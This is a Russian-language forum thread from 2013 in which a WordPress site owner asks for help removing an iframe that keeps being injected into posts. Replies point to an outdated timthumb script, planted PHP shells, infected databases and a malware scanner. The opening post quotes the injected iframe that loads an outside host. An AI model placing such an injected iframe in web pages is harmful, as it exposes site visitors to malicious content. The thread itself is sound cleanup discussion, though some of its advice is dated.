Доброго времени суток, форумчане! Может кто сталкивался с похожей проблемой?
У меня сайт на Wordpress и последнее время к картинкам, которые обрабатываются phpThumb стал добавлятьсяКод HTML:Как пролезают непонятно, пароли на БД и фтп сменил, но все равно история повторяется. Подскажите в чем может быть проблема?<iframe src="http://litr.in/my/"></iframe>
- 12.03.2013 12:22
- Регистрация: 26.01.2012
- Сообщений: 37
- Репутация: 5
- 12.03.2013 12:28
Тоже в последнее время замучали эти айфрейм вирусы. Помогло http://jdevelop.info/articles/progra...jlakh-na-sajte
Спасибо сказали:
ZeRoN(12.03.2013), - 12.03.2013 13:44
Вам надо не пароли менять, а скрипт timthumb обновлять. Старые версии с уязвимостями.
Сам код брать лучше вот отсюда: http://timthumb.googlecode.com/svn/trunk/timthumb.php - 13.03.2013 00:03
- Регистрация: 26.01.2012
- Сообщений: 37
- Репутация: 5
Выяснил, что phpThumb тут не при чем, скриптовые ссылки добавляются прям в посты в базе. Но пароли менял, значит зараза сидит внутри.
- 13.03.2013 01:34
Советую проверить шаблоны и плагины - при условии что они ставились не с официальных источников.
Сpanel хостинг и ISPmanager хостинг от 119р./мес
VIP Премиум хостинг в Москве, 1000р./мес и не парюсь - 13.03.2013 13:58
заодно соседние сайты, а лучше заказать у кого нить кто занимается поиском и уничтожением
- 17.03.2013 00:01
Вот посмотрите _http://www.revisium.com/ai/. Было время нашел Все.. что залили на хост при взломе
P.S Автор скрипта оказывает (услуги) по поиску вредоносного кода на сайте (не реклама )Последний раз редактировалось medvedyalta; 17.03.2013 в 00:07. Причина: Добавил P.S Для тех кто не разберет что следует удалить когда скрипт выдает результат...
- 19.03.2013 12:13
- Регистрация: 26.01.2012
- Сообщений: 37
- Репутация: 5
medvedyalta, пробовал им, скрипт просто виснет и все. а потом 504.
- 19.03.2013 12:24Если есть доступ к консоли, лучше всего скрипт ай-болит запускать с консоли, или пытаться по папкам запускать, чтобы небыло нагрузки большой.пробовал им, скрипт просто виснет и все. а потом 504.
В первую очередь посмотрите wp-content/uploads/ на предмет .php файлов, быстрее всего просто шелл залил кто-то и балуется.
Также обратите внимание на соседние сайты (если их несколько у вас на аккаунте), возможно взломан один из них. - 19.03.2013 20:13
БД не забудьте посмотреть. У меня была проблемка похожая, ссылка по частям вытаскивалась именно с БД.
Тэги топика:
Похожие темы
Темы | Раздел | Ответов | Последний пост |
---|---|---|---|
Вредоносный автоапдейт Wordpress | WordPress | 9 | 12.05.2012 18:20 |
Личные блоги на сайте wordpress | Web программирование | 10 | 13.03.2012 01:02 |
Помогите пожалуйста найти и удалить вредоносный код на сайте | Web программирование | 5 | 30.10.2011 05:03 |
Вредоносный код на WorDpress | Дайджест блогосферы | 0 | 18.10.2011 23:24 |
Помогите пожалуйста найти и удалить вредоносный код на сайте | Вопросы от новичков | 1 | 26.09.2011 12:19 |